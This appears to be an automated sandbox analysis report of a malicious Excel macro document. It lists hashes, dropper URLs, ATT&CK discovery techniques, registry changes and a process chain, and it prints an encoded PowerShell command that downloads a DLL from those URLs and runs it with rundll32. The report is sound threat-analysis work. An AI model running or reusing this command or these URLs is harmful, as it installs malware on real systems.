01d0e17728daffd2598b3fd12710e8a401e5af39111a2dc4c346c41beede330d

Analysis

max time kernel
121s
max time network
121s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
20/11/2024, 02:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

01d0e17728daffd2598b3fd12710e8a401e5af39111a2dc4c346c41beede330d.xls
Size

145KB
MD5

7d166ce2da5195fa2094871af38a8078
SHA1

0789b0a78de799562237fea12de0d05f15cc2ab8
SHA256

01d0e17728daffd2598b3fd12710e8a401e5af39111a2dc4c346c41beede330d
SHA512

715af94aa76008bc93e8649c6dc0f689673b3fa6a4629b350d46e17124a3fef9f06662f50a892b76122260f3df8c71d3f59ba25f81a38bed1181af00aa26781e
SSDEEP

3072:icKoSsxzNDZLDZjlbR868O8KlVH3jehvMqAPjxO5xyZUE5V5xtezEVg8/dgL4Lcc:icKoSsxzNDZLDZjlbR868O8KlVH3jehy

Score

10^/10

discovery

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://reumatismclinic.com/-/scCnm3mbJRpsaBKBbrC/

exe.dropper

https://shodhmanjari.com/wp-admin/xjEmK4Pd3N/

exe.dropper

http://tubelocal.net/wp-admin/X4Xm4Mk/

exe.dropper

https://pacifichomebroker.com/roderick/RRk/

exe.dropper

https://molinai-journal.com/wp-content/4HBv/

exe.dropper

https://marineboyrecords.com/font-awesome/QBBByHDDYl0slxlQ/

exe.dropper

https://mashuk.net/wp-includes/ej6R4fkU/

exe.dropper

https://lapalette.store/Fox-C404/Gngia6hD0i5zsgd2/

exe.dropper

https://jhonnycryptic.com/cgi-bin/OhZdKCDRBYGZudqs/

exe.dropper

https://korean911.com/wp-admin/TZczIsZtMFXxM5T/

exe.dropper

https://fonijuk.org/wp-content/fzq6vYFUMEiRoR8vG/

exe.dropper

https://baltoe.blog/-/6IC/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	2012	1964	wscript.exe	29

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\TypeLib\{8430C46F-5BA2-4D8A-834E-671DFD5BDE16}\2.0\0\win32	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\TypeLib\{8430C46F-5BA2-4D8A-834E-671DFD5BDE16}\2.0\ = "Microsoft Forms 2.0 Object Library"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\TypeLib\{8430C46F-5BA2-4D8A-834E-671DFD5BDE16}\2.0\FLAGS	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\TypeLib\{8430C46F-5BA2-4D8A-834E-671DFD5BDE16}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{8430C46F-5BA2-4D8A-834E-671DFD5BDE16}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{8430C46F-5BA2-4D8A-834E-671DFD5BDE16}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE\\MSForms.exd"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7"	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1964	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1228	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1228	powershell.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
1964	EXCEL.EXE
1964	EXCEL.EXE
1964	EXCEL.EXE
1964	EXCEL.EXE
1964	EXCEL.EXE

Suspicious use of WriteProcessMemory 23 IoCs

description	pid	Process	procid_target
PID 1964 wrote to memory of 2012	1964	EXCEL.EXE	30
PID 1964 wrote to memory of 2012	1964	EXCEL.EXE	30
PID 1964 wrote to memory of 2012	1964	EXCEL.EXE	30
PID 1964 wrote to memory of 2012	1964	EXCEL.EXE	30
PID 2012 wrote to memory of 2820	2012	wscript.exe	31
PID 2012 wrote to memory of 2820	2012	wscript.exe	31
PID 2012 wrote to memory of 2820	2012	wscript.exe	31
PID 2012 wrote to memory of 2820	2012	wscript.exe	31
PID 2820 wrote to memory of 1228	2820	cmd.exe	33
PID 2820 wrote to memory of 1228	2820	cmd.exe	33
PID 2820 wrote to memory of 1228	2820	cmd.exe	33
PID 2820 wrote to memory of 1228	2820	cmd.exe	33
PID 2012 wrote to memory of 2760	2012	wscript.exe	34
PID 2012 wrote to memory of 2760	2012	wscript.exe	34
PID 2012 wrote to memory of 2760	2012	wscript.exe	34
PID 2012 wrote to memory of 2760	2012	wscript.exe	34
PID 2760 wrote to memory of 272	2760	cmd.exe	36
PID 2760 wrote to memory of 272	2760	cmd.exe	36
PID 2760 wrote to memory of 272	2760	cmd.exe	36
PID 2760 wrote to memory of 272	2760	cmd.exe	36
PID 2760 wrote to memory of 272	2760	cmd.exe	36
PID 2760 wrote to memory of 272	2760	cmd.exe	36
PID 2760 wrote to memory of 272	2760	cmd.exe	36

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\01d0e17728daffd2598b3fd12710e8a401e5af39111a2dc4c346c41beede330d.xls
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1964
- C:\Windows\SysWOW64\wscript.exe
  wscript c:\programdata\sduoixo.vbs
  2⤵
  - Process spawned unexpected child process
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2012
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\programdata\jledshf.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2820
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -enc JABqAGUAbwBsAGkAcwBlADMAUgBoAGcARABaAFMANABjAGQAZgBnAD0AIgBoAHQAdABwADoALwAvAHIAZQB1AG0AYQB0AGkAcwBtAGMAbABpAG4AaQBjAC4AYwBvAG0ALwAtAC8AcwBjAEMAbgBtADMAbQBiAEoAUgBwAHMAYQBCAEsAQgBiAHIAQwAvACwAaAB0AHQAcABzADoALwAvAHMAaABvAGQAaABtAGEAbgBqAGEAcgBpAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB4AGoARQBtAEsANABQAGQAMwBOAC8ALABoAHQAdABwADoALwAvAHQAdQBiAGUAbABvAGMAYQBsAC4AbgBlAHQALwB3AHAALQBhAGQAbQBpAG4ALwBYADQAWABtADQATQBrAC8ALABoAHQAdABwAHMAOgAvAC8AcABhAGMAaQBmAGkAYwBoAG8AbQBlAGIAcgBvAGsAZQByAC4AYwBvAG0ALwByAG8AZABlAHIAaQBjAGsALwBSAFIAawAvACwAaAB0AHQAcABzADoALwAvAG0AbwBsAGkAbgBhAGkALQBqAG8AdQByAG4AYQBsAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ANABIAEIAdgAvACwAaAB0AHQAcABzADoALwAvAG0AYQByAGkAbgBlAGIAbwB5AHIAZQBjAG8AcgBkAHMALgBjAG8AbQAvAGYAbwBuAHQALQBhAHcAZQBzAG8AbQBlAC8AUQBCAEIAQgB5AEgARABEAFkAbAAwAHMAbAB4AGwAUQAvACwAaAB0AHQAcABzADoALwAvAG0AYQBzAGgAdQBrAC4AbgBlAHQALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBlAGoANgBSADQAZgBrAFUALwAsAGgAdAB0AHAAcwA6AC8ALwBsAGEAcABhAGwAZQB0AHQAZQAuAHMAdABvAHIAZQAvAEYAbwB4AC0AQwA0ADAANAAvAEcAbgBnAGkAYQA2AGgARAAwAGkANQB6AHMAZwBkADIALwAsAGgAdAB0AHAAcwA6AC8ALwBqAGgAbwBuAG4AeQBjAHIAeQBwAHQAaQBjAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8ATwBoAFoAZABLAEMARABSAEIAWQBHAFoAdQBkAHEAcwAvACwAaAB0AHQAcABzADoALwAvAGsAbwByAGUAYQBuADkAMQAxAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBUAFoAYwB6AEkAcwBaAHQATQBGAFgAeABNADUAVAAvACwAaAB0AHQAcABzADoALwAvAGYAbwBuAGkAagB1AGsALgBvAHIAZwAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBmAHoAcQA2AHYAWQBGAFUATQBFAGkAUgBvAFIAOAB2AEcALwAsAGgAdAB0AHAAcwA6AC8ALwBiAGEAbAB0AG8AZQAuAGIAbABvAGcALwAtAC8ANgBJAEMALwAiAC4AcwBwAEwAaQBUACgAIgAsACIAKQA7AGYATwByAGUAYQBDAGgAKAAkAGoAZAB0AEYASgBkAFgAaAByADYAdAB4AHkAaABkACAAaQBuACAAJABqAGUAbwBsAGkAcwBlADMAUgBoAGcARABaAFMANABjAGQAZgBnACkAewAkAHIAaAB5AGsAYQBqAGQAaABmAHMANwBpAGQAZgBnAGQAPQAiAGMAOgBcAHAAcgBvAGcAcgBhAG0AZABhAHQAYQBcAHYAYgBrAHcAawAuAGQAbABsACIAOwBpAE4AdgBPAGsAZQAtAHcARQBiAHIAZQBRAHUAZQBzAFQAIAAtAHUAUgBpACAAJABqAGQAdABGAEoAZABYAGgAcgA2AHQAeAB5AGgAZAAgAC0AbwB1AFQAZgBpAEwAZQAgACQAcgBoAHkAawBhAGoAZABoAGYAcwA3AGkAZABmAGcAZAA7AGkAZgAoAHQAZQBzAHQALQBwAEEAdABIACAAJAByAGgAeQBrAGEAagBkAGgAZgBzADcAaQBkAGYAZwBkACkAewBpAGYAKAAoAGcAZQB0AC0AaQBUAGUAbQAgACQAcgBoAHkAawBhAGoAZABoAGYAcwA3AGkAZABmAGcAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADQANQAwADAAMAApAHsAYgByAGUAYQBrADsAfQB9AH0A
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1228
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2760
  - - \??\c:\windows\syswow64\rundll32.exe
      c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd
      4⤵
      System Location Discovery: System Language Discovery
      PID:272

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\programdata\jledshf.bat

Filesize
3KB

MD5
016baa9173d80a2783f51e289ba3446c

SHA1
3207efbfaf61e29d86c969245008aad1fa7f9657

SHA256
24cc34c301ca2213382e1be7fb5241073d6e23b390ba1b2c6fa76faa5ca5d3b4

SHA512
39b79426561f73777b5f2e8349052c994329ebdbc123261123f3234291ffe4741fc6275438d092e7a449899becac30e4b2e899f9fd45c3ff1685e604a6ebf651

Download Submit
\??\c:\programdata\sduoixo.vbs

Filesize
561B

MD5
87a9c41dc3e67b9b0b6cdb367d4858bd

SHA1
00f117f9a02dad3c127b2c607ead43300c2bebbe

SHA256
f0b09a17f07b03b8cfe1969f84fcfb96933439707fa86ba8aa79181145512e18

SHA512
7373ca3127a1baf85e3cc6beb7b046788132b1bb388405657cb924435386d186a2645971128dc582a970242c4a3dfdc7fcce78ed158b0d430c96bbd18686f1dd

Download Submit
memory/1964-70-0x0000000006460000-0x0000000006560000-memory.dmp

Filesize
1024KB

Download
memory/1964-69-0x0000000006460000-0x0000000006560000-memory.dmp

Filesize
1024KB

Download
memory/1964-19-0x0000000006460000-0x0000000006560000-memory.dmp

Filesize
1024KB

Download
memory/1964-20-0x0000000006460000-0x0000000006560000-memory.dmp

Filesize
1024KB

Download
memory/1964-84-0x0000000006460000-0x0000000006560000-memory.dmp

Filesize
1024KB

Download
memory/1964-71-0x0000000006460000-0x0000000006560000-memory.dmp

Filesize
1024KB

Download
memory/1964-1-0x0000000071BCD000-0x0000000071BD8000-memory.dmp

Filesize
44KB

Download
memory/1964-8-0x0000000006EF0000-0x0000000006FF0000-memory.dmp

Filesize
1024KB

Download
memory/1964-7-0x0000000006460000-0x0000000006560000-memory.dmp

Filesize
1024KB

Download
memory/1964-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1964-89-0x0000000071BCD000-0x0000000071BD8000-memory.dmp

Filesize
44KB

Download
memory/1964-90-0x0000000006460000-0x0000000006560000-memory.dmp

Filesize
1024KB

Download
memory/1964-91-0x0000000006460000-0x0000000006560000-memory.dmp

Filesize
1024KB

Download
memory/1964-92-0x0000000006460000-0x0000000006560000-memory.dmp

Filesize
1024KB

Download
memory/1964-93-0x0000000006460000-0x0000000006560000-memory.dmp

Filesize
1024KB

Download